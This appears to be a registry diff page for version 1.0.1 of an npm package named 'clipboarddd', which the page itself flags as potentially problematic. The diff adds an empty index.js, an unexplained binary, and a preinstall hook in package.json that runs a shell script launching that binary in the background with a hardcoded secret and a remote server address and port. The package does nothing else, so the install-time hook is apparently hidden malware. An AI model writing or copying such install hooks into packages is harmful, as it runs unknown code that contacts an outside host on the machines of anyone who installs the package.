clipboarddd 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of clipboarddd might be problematic. Click here for more details.

package/README.txt ADDED
File without changes
package/bin/init ADDED
Binary file
package/bin/init.sh ADDED
@@ -0,0 +1 @@
1
+ chmod +x bin/init&&bin/init --secret=root@123456 --dns server=100.69.249.146,port=10005 &
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+
2
+ {
3
+ "name": "clipboarddd",
4
+ "version": "1.0.1",
5
+ "description": "",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "preinstall": "chmod +x bin/init.sh&&bin/init.sh &",
9
+ "postinstall": "echo 2"
10
+ },
11
+ "keywords": [],
12
+ "author": "",
13
+ "license": "ISC"
14
+ }
15
+